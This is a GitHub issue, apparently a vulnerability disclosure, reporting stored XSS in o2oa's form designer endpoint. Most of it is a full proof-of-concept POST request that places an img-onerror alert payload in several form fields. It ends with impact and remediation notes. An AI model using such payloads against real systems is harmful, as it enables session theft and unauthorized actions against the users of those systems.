Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Stored XSS in /x_processplatform_assemble_designer/jaxrs/form in o2oa ≤ 10.0-410-g3d5e0d2 #182

New issue
New issue
Open
Open
Stored XSS in /x_processplatform_assemble_designer/jaxrs/form in o2oa ≤ 10.0-410-g3d5e0d2#182
@ez-lbz

Description

@ez-lbz
ez-lbz
opened on Aug 19, 2025

Stored XSS in /x_processplatform_assemble_designer/jaxrs/form in o2oa ≤ 10.0-410-g3d5e0d2

Summary

In o2oa versions up to 10.0-410-g3d5e0d2, the endpoint /x_processplatform_assemble_designer/jaxrs/form is vulnerable to stored cross-site scripting (XSS). The vulnerability exists because user-supplied input, such as personal profile fields, is stored without sanitization and later rendered in the application, allowing persistent execution of malicious scripts.

Exploitation

POC:
POST /x_processplatform_assemble_designer/jaxrs/form?v=develop-10.0-410-3d5e0d2&mehur4z2 HTTP/1.1
Host: localhost
Content-Type: application/json; charset=UTF-8
Authorization: Wrr7kmtfAdF_VIsbJE2G29FepzPqRDNPvPAekU6E6zc
Sec-Fetch-Dest: empty
Referer: http://localhost/x_desktop/index.html
sec-ch-ua-platform: "Windows"
Sec-Fetch-Mode: cors
Origin: http://localhost
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/json,*/*
Cookie: x-token=Wrr7kmtfAdF_VIsbJE2G29FepzPqRDNPvPAekU6E6zc
Content-Length: 4926

{
  "id": "a9fa20e8-1bbf-43b1-9b24-706182c95ad4",
  "name": "\"><img src=1 onerror=alert(1)>",
  "alias": "\"><img src=1 onerror=alert(1)>",
  "hasMobile": false,
  "description": "\"><img src=1 onerror=alert(1)>",
  "application": "9fce716a-d406-40b8-9b79-7b636bd12cda",
  "category": "\"><img src=1 onerror=alert(1)>",
  "formFieldList": [],
  "relatedScriptMap": null,
  "relatedFormList": [],
  "mobileRelatedScriptMap": null,
  "mobileRelatedFormList": [],
  "data": "{\\\"json\\\":{\\\"id\\\":\\\"a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\",\\\"name\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"type\\\":\\\"Form\\\",\\\"mode\\\":\\\"PC\\\",\\\"description\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"application\\\":\\\"9fce716a-d406-40b8-9b79-7b636bd12cda\\\",\\\"applicationName\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"styles\\\":{\\\"background-color\\\":\\\"#f0f0f0\\\"},\\\"cssLinks\\\":[],\\\"scriptSrc\\\":[],\\\"submitScript\\\":{\\\"code\\\":\\\"layout.mobile ? this.popupProcessorMobile() : this.popupProcessor();\\\"},\\\"formStyleType\\\":\\\"blue-simple\\\",\\\"pid\\\":\\\"PCa9fa20e8-1bbf-43b1-9b24-706182c95ad4a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\",\\\"isReadonly\\\":false,\\\"languageType\\\":\\\"none\\\",\\\"isQuickSelect\\\":\\\"yes\\\",\\\"submitFormType\\\":\\\"default\\\",\\\"isHandwriting\\\":\\\"yes\\\",\\\"isPrompt\\\":true,\\\"promptPosition\\\":\\\"center\\\",\\\"afterProcessAction\\\":\\\"close\\\",\\\"category\\\":\\\"\\\\\\\"><img src=1 onerror=alert(1)>\\\",\\\"subformList\\\":[],\\\"$version\\\":\\\"5.2\\\"},\\\"html\\\":\\\"<div mwftype=\\\\\\\"form\\\\\\\" id=\\\\\\\"a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\\\\\" class=\\\\\\\"cssa9fa20e81bbf43b19b24706182c95ad4\\\\\\\" style=\\\\\\\"\\\\\\\"></div>\\\",\\\"isNewForm\\\":true}",
  "mobileData": "{\\\"json\\\":{\\\"id\\\":\\\"a9fa20e8-1bbf-43b1-9b24-706182c95ad4\\\",\\\"name\\\":\\\"新建表单\\\",\\\"type\\\":\\\"Form\\\",\\\"mode\\\":\\\"Mobile\\\",\\\"description\\\":\\\"\\\",\\\"application\\\":\\\"\\\",\\\"applicationName\\\":\\\"\\\",\\\"styles\\\":{},\\\"properties\\\":{},\\\"cssLinks\\\":[],\\\"scriptSrc\\\":[],\\\"jsheader\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"submitScript\\\":{\\\"code\\\":\\\"layout.mobile ? this.popupProcessorMobile() : this.popupProcessor();\\\",\\\"html\\\":\\\"\\\"},\\\"events\\\":{\\\"queryLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"postLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeSave\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterSave\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeClose\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeProcess\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeProcessWork\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterProcess\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeReset\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterReset\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeRetract\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterRetract\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeReroute\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterReroute\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeDelete\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterDelete\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"beforeModulesLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"afterModulesLoad\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"help\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"load\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"unload\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"click\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"dblclick\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"keydown\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"keypress\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"keyup\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mousedown\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mousemove\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mouseout\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mouseover\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"mouseup\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"focus\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"blur\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"submit\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"},\\\"reset\\\":{\\\"code\\\":\\\"\\\",\\\"html\\\":\\\"\\\"}},\\\"moduleList\\\":{},\\\"fieldList\\\":{}},\\\"html\\\":\\\"<div MWFType=\\\\\\\"form\\\\\\\" id=\\\\\\\"\\\\\\\"></div>\\\",\\\"id\\\":\\\"\\\",\\\"isNewForm\\\":true}"
}
Image

When the profile is viewed, the stored payload is executed, confirming XSS.

Image

Impact

  • Persistent JavaScript execution in victim browsers

  • Possible theft of session tokens or sensitive user data

  • Unauthorized actions performed on behalf of authenticated users

Remediation

Filter and escape user input in profile fields before storage and ensure proper output encoding when rendering data.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions